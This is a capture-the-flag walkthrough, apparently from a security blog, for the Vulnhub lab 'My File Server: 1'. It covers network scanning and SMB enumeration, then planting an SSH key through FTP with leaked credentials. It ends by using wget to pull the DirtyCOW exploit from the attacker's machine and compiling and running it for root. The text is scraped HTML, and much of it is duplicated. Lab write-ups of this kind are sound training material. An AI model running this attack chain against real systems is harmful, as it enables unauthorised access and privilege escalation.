I will share with you a new Walkthrough for Vulnhub machines. My File Server: 1 This CTF machine is Created by Akanksha Sachin Verma You can download here this CTF . I would call this box on the easy side but there are a lot of moving parts which can cause you to follow some different directions. I don’t want to say to much so let’s get at it.<\/p>\n
![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-15-52-57.png\")
<\/strong><\/h3>\nPenetration Testing Methodologies<\/strong><\/h3>\nNetwork Scan<\/strong><\/p>\n\n- Netdicover<\/li>\n
- Nmap<\/li>\n<\/ul>\n
Enumeration<\/strong><\/p>\n\n- SMBMAP<\/li>\n
- Nikto<\/li>\n<\/ul>\n
Exploit<\/strong><\/p>\n\n- Injecting id_rsa.pub<\/li>\n<\/ul>\n
Privilege Escalation<\/strong><\/p>\n\n- Kernel Exploit<\/li>\n
- Capture the Flag.<\/li>\n<\/ul>\n
Network Scanning<\/h4>\n
So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I\u2019ve found is 192.168.2.5<\/p>\n
netdiscover\u00a0 -i vboxnet0<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-15-55-24.png\")
<\/p>\n
Let\u2019s proceed with network scan using Nmap aggressive scan as given below<\/p>\n
nmap -p- -A 192.168.2.5<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-00-58.png\")
<\/p>\n
Enumeration<\/h3>\n
It was very interesting as there were so many services running on the host network. We saw FTP\u2019s \u201canonymous login enabled\u201d and port 445 was also available for SMB.<\/p>\n
![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-01-20.png\")
<\/p>\n
In order to enumerate SMB and identify a username as \u201csmbuser\u201d , I use the following command.<\/p>\n
smbmap -H 192.168.2.5\r\nsmbclient\u00a0 -L 192.168.2.5<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-07-31.png\")
<\/p>\n
On applying the Nmap script for SMB we found a user named smbuser<\/p>\n
nmap --script smb-enum-shares.nse -p445 192.168.2.6<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-29-18-37-59.png\")
<\/p>\n
We also explore the IP host in the web browser as port 80 has been opened for the HTTP service. There was nothing special at web page just a link to Amrour Infosec.<\/p>\n
![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-13-11.png\")
<\/p>\n
I chose to run Nikto for HTTP weak config listing, and luckily found an entry for \u201creadme.txt,\u201d let\u2019s test this in the web browser.<\/p>\n
nikto -h http:\/\/192.168.2.5<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-14-57.png\")
<\/p>\n
I think the author has kept this file as a clue that he wants to get the password by searching the readme.txt file. So now I had the username \u201csmbuser\u201d and the password \u201crootroot1\u201d and it was time to connect to the host machine via ssh, so I tried to use this cred for ssh login, but we got an error as connection timeout, which means that the username \u201csmbuser\u201d cannot connect to the host machine via ssh.<\/p>\n
![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-18-06.png\")
<\/p>\n
Exploitation<\/strong><\/h3>\nNow time to generate some ssh keys, thus we used ssh-keygen to generate ssh public keys without password in our local machine i.e. KALI LINUX. Moving on after the key is created, we moved into the .ssh directory on our native shell, here we saw that we have the key named \u201cid_rsa.pub\u201d.<\/p>\n
Let\u2019s generate keys for SSH so we can login into smbuser!<\/p>\n
Steps:<\/p>\n
\n- Create ssh key pair by running ssh-keygen.<\/li>\n
- Create .ssh directory on the mounted share \/home\/smbuser\/.ssh<\/li>\n
- Copy the content of the public key to \/home\/smbuser\/.ssh.<\/li>\n
- SSH into smbuser@_victim_ip_!<\/li>\n<\/ol>\n
ssh-keygen\r\ncd .ssh\r\nls -lha\r\n<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-22-53.png\")
<\/p>\n
With the help of above-enumerated creds \u201csmbuser:rootroot1<\/strong>\u201d we logged into FTP and create a folder as .ssh inside \/home\/smbuser, then try to upload the id_rsa.pub which we have generated in above mention step as authorized_keys\u00a0 inside the .ssh directory.<\/p>\nftp 192.168.2.5\r\npwd\r\nmkdir .ssh\r\ncd .ssh\r\nput \/root\/.ssh\/.id_rsa.pub authorized_keys\r\nexit\r\n<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-32-10.png\")
<\/p>\n
Now we should be able to ssh with the private key:<\/p>\n
ssh -i id_rsa smbuser@192.168.2.5<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-37-29.png\")
<\/p>\n
uname -a<\/pre>\n <\/p>\n
I found it\u2019s a really old version of the kernel that\u2019s built here, so I\u2019m trying to check for a piece of code to exploit, and luckily, I find it to be a DIRTYCOW exploit. So, I download a hack from Exploit-DB<\/a> written in c.<\/p>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-41-26.png\")
<\/p>\n
Privilege Escalation <\/strong><\/h3>\nI downloaded the exploit inside the host machine, and then compiled it before running the exploit, so I ran the following commands.<\/p>\n
python\u00a0 -m SimpleHTTPServer 8080\r\nON THE SHELL\r\nwget http:\/\/192.168.2.1:8080\/40616.c\r\ngcc 40616.c -o dasagreeva -pthread\r\n.\/dasagreeva<\/pre>\nEureka……. Root ……<\/p>\n
![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-16-50-14.png\")
<\/p>\n
Boom! We got root the shell by running .\/dasagreeva<\/strong> and finally, we obtain proof.txt<\/strong> file.<\/p>\ncd \/root\r\nls\r\ncat proof.txt\r\nid\r\nhostname<\/pre>\n![\"\"](\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-28-17-37-45.png\")
<\/strong><\/p>\n
Network Scan<\/strong><\/p>\n Enumeration<\/strong><\/p>\n Exploit<\/strong><\/p>\n Privilege Escalation<\/strong><\/p>\n So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I\u2019ve found is 192.168.2.5<\/p>\n Let\u2019s proceed with network scan using Nmap aggressive scan as given below<\/p>\n It was very interesting as there were so many services running on the host network. We saw FTP\u2019s \u201canonymous login enabled\u201d and port 445 was also available for SMB.<\/p>\n In order to enumerate SMB and identify a username as \u201csmbuser\u201d , I use the following command.<\/p>\n On applying the Nmap script for SMB we found a user named smbuser<\/p>\n We also explore the IP host in the web browser as port 80 has been opened for the HTTP service. There was nothing special at web page just a link to Amrour Infosec.<\/p>\n I chose to run Nikto for HTTP weak config listing, and luckily found an entry for \u201creadme.txt,\u201d let\u2019s test this in the web browser.<\/p>\n I think the author has kept this file as a clue that he wants to get the password by searching the readme.txt file. So now I had the username \u201csmbuser\u201d and the password \u201crootroot1\u201d and it was time to connect to the host machine via ssh, so I tried to use this cred for ssh login, but we got an error as connection timeout, which means that the username \u201csmbuser\u201d cannot connect to the host machine via ssh.<\/p>\n Now time to generate some ssh keys, thus we used ssh-keygen to generate ssh public keys without password in our local machine i.e. KALI LINUX. Moving on after the key is created, we moved into the .ssh directory on our native shell, here we saw that we have the key named \u201cid_rsa.pub\u201d.<\/p>\n Let\u2019s generate keys for SSH so we can login into smbuser!<\/p>\n Steps:<\/p>\n With the help of above-enumerated creds \u201csmbuser:rootroot1<\/strong>\u201d we logged into FTP and create a folder as .ssh inside \/home\/smbuser, then try to upload the id_rsa.pub which we have generated in above mention step as authorized_keys\u00a0 inside the .ssh directory.<\/p>\n Now we should be able to ssh with the private key:<\/p>\n <\/p>\n I found it\u2019s a really old version of the kernel that\u2019s built here, so I\u2019m trying to check for a piece of code to exploit, and luckily, I find it to be a DIRTYCOW exploit. So, I download a hack from Exploit-DB<\/a> written in c.<\/p>\n I downloaded the exploit inside the host machine, and then compiled it before running the exploit, so I ran the following commands.<\/p>\n Eureka……. Root ……<\/p>\n Boom! We got root the shell by running .\/dasagreeva<\/strong> and finally, we obtain proof.txt<\/strong> file.<\/p>\n\n
\n
\n
\n
Network Scanning<\/h4>\n
netdiscover\u00a0 -i vboxnet0<\/pre>\n
<\/p>\nnmap -p- -A 192.168.2.5<\/pre>\n
<\/p>\nEnumeration<\/h3>\n
<\/p>\nsmbmap -H 192.168.2.5\r\nsmbclient\u00a0 -L 192.168.2.5<\/pre>\n
<\/p>\nnmap --script smb-enum-shares.nse -p445 192.168.2.6<\/pre>\n
<\/p>\n<\/p>\nnikto -h http:\/\/192.168.2.5<\/pre>\n
<\/p>\n<\/p>\nExploitation<\/strong><\/h3>\n
\n
ssh-keygen\r\ncd .ssh\r\nls -lha\r\n<\/pre>\n
<\/p>\nftp 192.168.2.5\r\npwd\r\nmkdir .ssh\r\ncd .ssh\r\nput \/root\/.ssh\/.id_rsa.pub authorized_keys\r\nexit\r\n<\/pre>\n
<\/p>\nssh -i id_rsa smbuser@192.168.2.5<\/pre>\n
<\/p>\nuname -a<\/pre>\n
<\/p>\nPrivilege Escalation <\/strong><\/h3>\n
python\u00a0 -m SimpleHTTPServer 8080\r\nON THE SHELL\r\nwget http:\/\/192.168.2.1:8080\/40616.c\r\ngcc 40616.c -o dasagreeva -pthread\r\n.\/dasagreeva<\/pre>\n
<\/p>\ncd \/root\r\nls\r\ncat proof.txt\r\nid\r\nhostname<\/pre>\n
<\/strong><\/p>\n